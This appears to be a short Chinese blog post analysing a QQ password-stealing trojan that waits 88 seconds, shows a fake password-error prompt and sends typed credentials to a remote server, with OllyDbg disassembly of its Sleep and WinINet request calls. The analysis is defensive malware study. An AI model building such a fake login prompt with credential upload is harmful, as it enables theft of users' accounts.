http://ift.tt/2EygpUZ
盗号病毒分析
病毒应用
双击应用,程序会睡眠较长的时间,然后会弹出一个应用QQ账户密码错误的提示,让用户输入账户的密码,然后上传账号密码到自己的服务器
执行平台
win7 32
执行流程
界面极其具有欺骗性,如果用户不小心输入账户和密码之后,就会被上传到服务器
分析代码
分析工具
od
PEID
恶意代码
首先,当用户点击启动的时候,会发现无翻译,其实在在窗口ShowWindow之前,暂停了88秒才显示
00401AB0 . 8B4424 0C mov eax,dword ptr ss:[esp+0xC]
00401AB4 . 33C9 xor ecx,ecx
00401AB6 . 8B00 mov eax,dword ptr ds:[eax]
00401AB8 . 85C0 test eax,eax
00401ABA . 0f9cc1 setl cl
00401ABD . 49 dec ecx
00401ABE . 23C1 and eax,ecx
00401AC0 . 50 push eax ; /Timeout = 88000. ms
00401AC1 . FF15 E0824800 call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
88秒之后,软件显示,如果用户大意输入账户和密码之后,会对发送的链接进行格式拼接
"http://ift.tt/2EyLUhF;
拼装好发送的字符串之后, 首先会调用InternetOpen函数建立链接
0045FF65 |. 51 push ecx
0045FF66 |. 83E0 02 and eax,0x2
0045FF69 |. 40 inc eax
0045FF6A |. 50 push eax
0045FF6B |. 68 48854B00 push 3.004B8548 ; ASCII "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
0045FF70 |. FF15 44864800 call dword ptr ds:[<&WININET.InternetOpe>; wininet.InternetOpenA
成功建立连接之后,会调用API发送请求
0046024A . 8B4D D0 mov ecx,dword ptr ss:[ebp-0x30]
0046024D . 8B45 08 mov eax,dword ptr ss:[ebp+0x8]
00460250 . 57 push edi
00460251 . 8D55 B0 lea edx,dword ptr ss:[ebp-0x50]
00460254 . 51 push ecx
00460255 . 52 push edx
00460256 . 57 push edi
00460257 . 68 C0854B00 push 3.004B85C0 ; ASCII "HTTP/1.0"
0046025C . 50 push eax
0046025D . 68 BC854B00 push 3.004B85BC ; ASCII "GET"
00460262 . 56 push esi
00460263 . C745 B0 AC854>mov dword ptr ss:[ebp-0x50],3.004B85AC ; ASCII "Accept: */* \r\n"
0046026A . 897D B4 mov dword ptr ss:[ebp-0x4C],edi
0046026D . FF15 38864800 call dword ptr ds:[<&WININET.HttpOpenRequestA>] ; wininet.HttpOpenRequestA
后面猜测是会发送数据到服务器,因为在这个地方建立链接失败了,虽然返回反馈成功,那个网址都挂了,应该是失败了
然后就是CreateWindow的时候说如果发送成功,本地会生成一个test.txt写着是你发送的内容,也没有看到
http://ift.tt/2Fs34yT VIRUS January 12, 2018 at 08:44AM
评论
发表评论